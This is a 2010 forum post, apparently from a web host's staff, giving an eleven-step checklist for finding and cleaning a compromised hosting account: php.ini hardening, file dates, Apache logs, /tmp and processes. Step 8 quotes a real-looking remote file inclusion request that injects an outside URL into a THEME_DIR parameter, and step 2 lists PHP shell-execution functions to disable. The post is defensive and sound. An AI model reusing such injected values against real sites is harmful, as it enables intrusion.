PDA

View Full Version : Cracked Account Checklist



ifurniss
11-15-2010, 06:58 PM
I frequently cleaned cracked WestHost accounts, but sometimes they are not cracked or it's a little hard to track down.
Here is a guide for what to look for if you think that something might be compromised. This is mostly for WestHost 3.0 Accounts, but a lot can translate to other systems and hosts.

1. Location, Location, Location: Where is the malicious content initially found? 9 times out of 10 it'll be in a sub-location of a specific PHP application. And that application is usually the one that was exploited.

2. PHP variables. Below are common exploited functions within PHP. Ensure the below 3 are disabled if at all possible [or just enabled for the necessary directory].

Quick check of /etc/php.ini variables

disable_functions = passthru,proc_open,shell_exec,system //Ensure these are in the list
register_globals = Off
allow_url_fopen = Off
allow_url_include = Off

3. Modification dates: What are the modification times on the files? This is very important as it lets you know how old the hack is. If you know when it was put there then you can examine log files for anything suspicious at that time.

4. Got POST? Look for pages that have been posted to the most within Apache logs. Typically if there is a backdoor shell it'll show up in the list.

5. Check for strange files in /tmp. This is a common location for crackers to stick scripts.

6. Check your process list for anything suspicious. If you see something either install lsof and take a look at where its executing from or contact us to check for you.

7. Know your log files. Do you know how to enable ftp logs? Where they are kept? bash_history? access_log's? error_logs? Check them all.

8. Run the command below and look for any strange GET requests.

awk -F '"' '{print $2}' /var/log/httpd/access_log | grep -E '/?' | less

Example: GET /domain.html/default/theme.php?THEME_DIR=http://www.getit.pl///opinia/Ckrid1.txt?? HTTP/1.1
GET /default/theme.php?THEME_DIR=http://www.getit.pl///opinia/Ckrid1.txt??

9. Document: Always document everything you've seen and everything you find and everything you do.

10. Google's your friend. Chances are if someone has been hacked, its happened a million times over to others running the same application. Typically there are posts on possible entry points, etc.

11. Repetition, repetition, repetition. Hackers like to repeat things. Why? Because they use scripts to do their work for them. So if you find one instance check for others in other files.

This could be expanded, but these steps are good places to check if you are worried about your account's security.